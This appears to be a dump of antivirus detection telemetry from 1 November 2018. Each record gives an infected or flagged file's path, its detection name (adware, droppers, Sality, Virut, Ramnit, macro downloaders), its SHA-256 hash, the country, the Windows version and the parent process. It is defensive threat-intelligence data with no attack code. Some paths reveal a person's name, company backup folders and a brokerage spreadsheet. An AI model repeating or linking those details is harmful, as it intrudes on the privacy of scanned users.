  Row(detection=Row(filename='wijdq.exe', filepath='C:\\ProgramData\\RoyaalCouponu\\WIJdq.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23816, timestamp='2018-11-01T21:10:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164354-3bb87710', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85699471\\AVSCAN-20181101-160404-9B7043B4\\AVSCAN-20181101-164354-3BB87710', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151334-1ade30e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30cda9a5\\AVSCAN-20181101-064204-6F5AEFD4\\AVSCAN-20181101-151334-1ADE30E9', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:13:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='j.exe', filepath='C:\\ProgramData\\AllSaver\\J.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline='--engine=2 --session-id=NEk3Mu9iP1Jl7knGdwZd8AKuEdvTSSEGt2u2cEhE --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-01T10:44:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-074500-5610eae8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_58cdea1d\\AVSCAN-20181101-073845-21B9BF28\\AVSCAN-20181101-074500-5610EAE8', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:45:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f.exe', filepath='C:\\ProgramData\\50Coupons\\F.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline='--engine=2 --session-id=NEk3Mu9iP1Jl7knGdwZd8AKuEdvTSSEGt2u2cEhE --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-01T10:44:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cardsdllzf.dll', filepath='j:\\محمد\\الأنشطة\\الافراح\\برامج\\gta san andrea  saudi\\new folder\\p fifa 13\\game\\dlc\\dlc_cardsdll\\dlc\\CardsDLLzf.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='72537cf097360d54f80dc5187e01d2ce6dea60070417b93a43dfc7ac963a1d5e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:14:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0161081.dll', filepath='j:\\system volume information\\_restore{2d40b68e-637a-43d2-8b7c-51a8ae33b02f}\\rp183\\A0161081.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='72537cf097360d54f80dc5187e01d2ce6dea60070417b93a43dfc7ac963a1d5e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apachemonitor.exe', filepath='H:\\xampp\\apache\\bin\\ApacheMonitor.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='728e85e6f409674780626c1ac8bd8be3751b9a5b108b5fc8ac558d5a6cbc3da6', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1716224, timestamp='2018-11-01T06:59:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dx81bredist.exe', filepath='i:\\new folder\\adata ufd\\drive\\pess 6\\dx8.1b redist\\license\\dx81bredist.exe', filesize=25852000, name='W32/Sality.AT.#M1.#R1'), hash='72a170608734f1aebda7a5e25b7356d90967a3c192517395c2bbefb63c2cb476', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\72A55FB04DF96203C636A52AA2824C07558E785BE34E646FE3749EE2A19EB26B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:25:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='airxonix.exe', filepath='\\?\\J:\\العاب\\AirXonix1\\AirXonix.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='72c2538e557d861853f3ed6780537114ceb6256e6246e7a4e3f8a60795f986e4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='报总部201306投顾提成表.xls', filepath='F:\\CJ\\U盘备份\\20181101\\工作资料\\财富证券工作资料\\工作资料\\投顾资料\\资料\\投顾业绩提成明细\\2013\\公司上报提出表\\报总部201306投顾提成表.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='72fb1b1fdf6460845b84b6d8140470ec90b16929bcc160bb4c3e836bac9ee404', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T01:04:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090604-f5879406', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b74c1cd5\\AVSCAN-20181101-090516-EE59C3E3\\AVSCAN-20181101-090604-F5879406', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='72fb1b1fdf6460845b84b6d8140470ec90b16929bcc160bb4c3e836bac9ee404', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:06:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195648-106ad8ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058d263d\\AVSCAN-20181101-194346-9A701436\\AVSCAN-20181101-195648-106AD8EF', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='731393a63a1aea598a83191165266496274c44985a23f8a0182b95b3c06b5c90', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:56:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7325c0baa6abde90413720551470deb500e0bbd7d09938270413cfac141aeaee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\7325C0BAA6ABDE90413720551470DEB500E0BBD7D09938270413CFAC141AEAEE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7325c0baa6abde90413720551470deb500e0bbd7d09938270413cfac141aeaee', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:52:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8fyjrj7tu.vir', filepath='\\\\?\\C:\\Program Files\\8FYJRJ7TUD\\8FYJRJ7TU.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76qn6rort.vir', filepath='\\\\?\\C:\\Program Files\\76QN6RORTL\\76QN6RORT.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8fyjrj7tu.vir', filepath='\\\\?\\C:\\Program Files\\8FYJRJ7TUD\\8FYJRJ7TU.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8fyjrj7tu.vir', filepath='\\\\?\\C:\\Program Files\\8FYJRJ7TUD\\8FYJRJ7TU.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76qn6rort.vir', filepath='\\\\?\\C:\\Program Files\\76QN6RORTL\\76QN6RORT.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76qn6rort.vir', filepath='\\\\?\\C:\\Program Files\\76QN6RORTL\\76QN6RORT.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76qn6rort.vir', filepath='\\\\?\\C:\\Program Files\\76QN6RORTL\\76QN6RORT.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:20:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8fyjrj7tu.vir', filepath='\\\\?\\C:\\Program Files\\8FYJRJ7TUD\\8FYJRJ7TU.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:20:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zisgy27ti.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-10-31_09-43-19\\ZISGY27TI.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T00:37:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9pwoex5xi.exe', filepath='C:\\PROGRA~1\\9PWOEX5XI3\\9PWOEX5XI.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T20:23:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r3.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  APRIL. 2010\\R3.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='7354a3f014dcad49f27270006d3b9f3855204e20241bd4c0dac0d3344323b4ba', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:45:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='73636585a3faa3db1560fcb8b8c1f1a7c92c19b14896fa4c6be5ceb417baaf89', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\73636585A3FAA3DB1560FCB8B8C1F1A7C92C19B14896FA4C6BE5CEB417BAAF89', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='73636585a3faa3db1560fcb8b8c1f1a7c92c19b14896fa4c6be5ceb417baaf89', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='high tv chanelle.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa0.745\\high tv chanelle.exe', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1433592, timestamp='2018-11-01T17:18:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192347-b5777aff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-192328-B38F4DBB\\AVSCAN-20181101-192347-B5777AFF', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192425-b97f4580', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-192407-B7903B2C\\AVSCAN-20181101-192425-B97F4580', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192433-ba574605', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-192407-B7903B2C\\AVSCAN-20181101-192433-BA574605', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191940-9ba74e63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-191912-98CE9786\\AVSCAN-20181101-191940-9BA74E63', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191950-9cb0cc27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-191912-98CE9786\\AVSCAN-20181101-191950-9CB0CC27', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zuma&mb.exe', filepath='F:\\MaZiKa2daY.CoM.Top.Zuma.By.IneXaTo\\Zuma&MB.exe', filesize=5312000, name='W32/Sality.AT.#M1.#R1'), hash='73c0214f39025fde2b7a986da191476396bab4375e65541fd9257d9d119e3074', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T20:36:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zuma&mb.exe', filepath='F:\\MaZiKa2daY.CoM.Top.Zuma.By.IneXaTo\\Zuma&MB.exe', filesize=5312000, name='W32/Sality.AT.#M1.#R1'), hash='73c0214f39025fde2b7a986da191476396bab4375e65541fd9257d9d119e3074', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T20:36:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150504-582b88c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-150432-515911F0\\AVSCAN-20181101-150504-582B88C0', filesize=1024000, name='ADWARE/Kuaiba.1024000.1.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:05:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160050-02a3de41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160002-F84739B4\\AVSCAN-20181101-160050-02A3DE41', filesize=1024000, name='ADWARE/Kuaiba.1024000.1.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160514-0377784b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160316-EA08796C\\AVSCAN-20181101-160514-0377784B', filesize=1024000, name='ADWARE/Kuaiba.1024000.1.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:01:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='Adware/Kuaiba.1024000.1.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:39:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='741184db61a2c19a5e3d6fa7f8f2d834b16388ea87890435c027b85347b7ec6e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\741184DB61A2C19A5E3D6FA7F8F2D834B16388EA87890435C027B85347B7EC6E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='741184db61a2c19a5e3d6fa7f8f2d834b16388ea87890435c027b85347b7ec6e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:52:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_isdel.exe', filepath='N:\\Copia cartek 17_03_15\\Discos utiles\\BMW6.5\\ENG\\_ISDel.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='74db3252fbfb556db78b4697ff67b4aa0078323c1707b0ce34f6a63afc01625e', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:01:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162810-2489a017', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed6d7824\\AVSCAN-20181101-155643-3A4A76A5\\AVSCAN-20181101-162810-2489A017', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='74fb2bad874b16fb119d834b293792f4bc05496ff67c28be623ac5d0d82f7aec', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:28:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='u3.exe', filepath='E:\\u3.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='\xa0.exe', filepath='E:\\\xa0.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='u4.exe', filepath='E:\\U4.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:05Z'), dt=datetime.date(2018, 11, 1)),
